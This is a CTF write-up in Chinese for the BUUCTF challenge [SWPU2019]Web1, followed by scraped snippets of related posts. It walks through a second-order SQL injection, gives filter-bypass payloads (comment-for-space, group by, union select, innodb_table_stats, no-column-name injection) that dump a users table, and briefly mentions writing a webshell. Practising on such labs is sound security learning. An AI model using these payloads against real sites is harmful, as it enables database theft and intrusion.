代码编织梦想

https://buuoj.cn/challenges#[SWPU2019]Web1

在这里插入图片描述
登录注册、在测试的时候发现发布中的广告名如果输入一些敏感关键字,例如andor。会有警告

在这里插入图片描述
猜测广告名存在注入,尝试在广告名处输入单引号',发布的时候并没有任何反应,发布后有个广告详情可以查看发布的广告。

在这里插入图片描述
直接报错了,基本确定广告名存在二次注入

在这里插入图片描述
然后再之后的对广告名的fuzz测试中发现以下过滤

空格被替换为空
or
and
join
--+
#
updatexml
extractvalue
exp
floor
...

尝试联合查询、首先需要判断有多少字段,order by不能使用,可以使用group by或者into @a, @b, @c, ...

无法注释就尝试构造闭合

在这里插入图片描述
空格就用/**/代替

title='group/**/by/**/23,'&content=mochu7&ac=add

在这里插入图片描述
联合查询

title='union/**/select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22&content=mochu7&ac=add

在这里插入图片描述
查表明,因为这里过滤or所以也无法使用information_schema表,也没有sys表,所以使用mysql.innodb_table_stats

title='union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22&content=mochu7&ac=add

在这里插入图片描述
但是因为没有字段信息可以查,使用无列名注入直接查内容

title='union/**/select/**/1,(select/**/group_concat(`3`)/**/from/**/(select/**/1,2,3/**/union/**/select/**/*/**/from/**/users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22&content=mochu7&ac=add

在这里插入图片描述

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/127005944

buuctf [SWPU2019]Web1 记录-爱代码爱编程

注册进去发现可以发广告,这种格式不是sql注入就是xss漏洞。 可以发现是存在的。后面用beef发现没用,并不是窃取cookie信息来登录后台 试试sql注入 在标题上进行判断 可以发现标题存在sql注入,往后面试,发现%23和--+ 不能闭合。 我们可以在后面加上别的 可以发现,上图''1'' 和这边的'322' 1’是我们输入的内容。 多加个单引号构

Web-10(37-40)-BUUCTF平台-爱代码爱编程

本篇内容 [CISCN2019 华北赛区 Day1 Web1]Dropbox [CISCN2019 华北赛区 Day1 Web2]ikun [ASIS 2019]Unicorn shop [安洵杯 2019]easy_web 上一篇 | 目录 | 下一篇 [CISCN2019 华北赛区 Day1 Web1]Dropbox 考点: 1、任意

BUUCTF [SWPU2019] Web3-爱代码爱编程

BUUCTF [SWPU2019] Web3 考点: Flask伪造sessionunzip()存在软链接攻击软链接的压缩包的制作/cwd指向当前进程运行目录的一个符号链接,即Flask运行进程目录启动环境: 首先是一个登陆页面,标题为:CTF-Flask-Demo,推测其应为Flask所编写,尝试使用admin用户登陆: 用户名:admin

BUUCTF:[SWPU2019]Web1-爱代码爱编程

一个登录页面,先去试着注册一个账号 老样子试图注册admin,发现用户已存在 那先随便注册个123 123进去 然后申请一下发布广告 发现实现了一个留言板的功能,考虑一下有没有存在注入的可能。 申请一个1’发现存在着回显 fuzz一下,可以发现过滤挺多东西的。比如空格我们可以用/**/替代导致无法使用information_schema库,我们可以通过无

BUUCTF:[SWPU2019]Web1 sql注入 MariaDB注入--无列名注入-group_concat ---- /**/---group by ----- 3.9修改-爱代码爱编程

目录: 一、自己做:二、不足&&学到的:三、学习WP1.测试看看过滤了那些关键字,(这里要多看看,学学)2.使用无列名注入:这里稍停一下:3.下面学习无列名注入:load_file(),既然中间那块能够执行select了。那么 这个是不是也应该可以啊1. 查看文件,2. 写入木马: 无列名注入详解:无列名注入详解 参考自:本题

buuctf [SWPU2019]Web1 1-爱代码爱编程

buuctf [SWPU2019]Web1 1 sql 无列名注入 二次注入 注册登录发布广告 1'测试 存在sql注入 经测试,or,空格,#被过滤 不能用order by测试列数,用group by代替 注释符#用,'3代替,数字随便 (这里的'相当于闭合了输入语句里参数的右引号,变成'3'字符串,此时整个语句没有注释符)(如果参数不在sql语

-------已搬运------SQL注入的 过滤 思路 payload 万能密码-爱代码爱编程

目录: 一、过滤关键词:1. 过滤 `=` 可用 `like`,`regexp`,`in`来代替:2. 过滤`ascii`,不能用bool盲注了。可用`ord`来代替:3. `,`逗号被过滤了:1. `substr(***,1,1)` 用这个来代替:`substr(***from({})for(1))`2.`limit 0,1` 用这个来代替:`l

BUUCTF--[SWPU2019]Web3-爱代码爱编程

进入后是一个登录页面,本以为要秀一番操作,这里直接随便输入即可登录进去 登录进去后只有一个upload按钮,点击后给出提示Permission denied!,这里猜测是要伪造Session 找到session,将session的值进行分析  使用大佬的脚本可以解这个session #!/usr/bin/env python3 import

[SWPU2019]Web1-爱代码爱编程

1.二次注入 2.bypass information_schema 3.无列名注入 bypass information_schema 尝试使用单引号判断是否存在注入 报错说明存在二次注入 题目环境过滤了空格,我们使用/**/来进行绕过。过滤了or,因此我们无法使用order by 以及information_schema这个库。因为过滤了注释符,所以

buuctf-[SWPU2019]Web1(小宇特详解)-爱代码爱编程

buuctf-[SWPU2019]Web1(小宇特详解) 1.先看题目 2.这里我怀疑是sql注入,尝试了万能密码和sqlmap都没有效果 3.这里发现了有一个注册登录的地方 这里自己注册一个,不要注册admin,不要问我怎么知道的。 这里进去之后是一个广告信息管理 这里使用1’ order by 1# 来测试一下 显示

SWPUCTF2019web题复现-爱代码爱编程

[SWPU2019]web1-easy_web 有一个登录框,试了试万能密码失败,那就注册吧 登录后发现有一个申请广告,在标题处输入11111111’,发现报错,应该是sql注入 禁用了or,空格等等,先使用union发现有22列-1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,1

web buuctf [SWPU2019]Web1-爱代码爱编程

考点:无列名注入 1. 登录界面和注册界面,发现admin账号被注册了,fuzz也没爆出密码来;尝试注入,dirsearch也没东西,源码上也没啥东西 最后注册了一个账号,登录进去    随便填了填,申请过去 这是广告详情    看url上有个id,尝试着注入,也没发现啥问题,没有地方报错 2.在广告申请栏的标题注入1',在查看广

buuctf-Web1-爱代码爱编程

在登陆界面用sql注入的各种手段都没用,注册进去看看 抓包后发现数据包有点像xss,也能使它弹窗,但是好像没什么用 用标题1' 会有关于sql语句的弹窗(但是如果抓包就不会出现) 也能说明是单引号闭合(1"就不行,能知道是sql注入也不容易) 闭合语句的时候出了问题(1'#,1'--+) 1'%23不会被过滤,但是好像

buuctf misc 专题(99)[swpu2019]network_tt_npc的博客-爱代码爱编程

下载附件,是个txt文件 发现是TTL隐写,直接用脚本跑 import binascii with open('attachment.txt','r') as fp: a=fp.readlines() p=[] for x in range(len(a)): p.append(int(a[x]))

buuctf web3_buuctf逻辑漏洞-爱代码爱编程

目录 [WUSTCTF2020]朴实无华 [安洵杯 2019]easy_serialize_php ASIS 2019]Unicorn shop  [CISCN 2019 初赛]Love Math [WesternCTF2018]shrine [网鼎杯 2020 朱雀组]Nmap [SWPU2019]Web1 [MRCTF2020]PYWe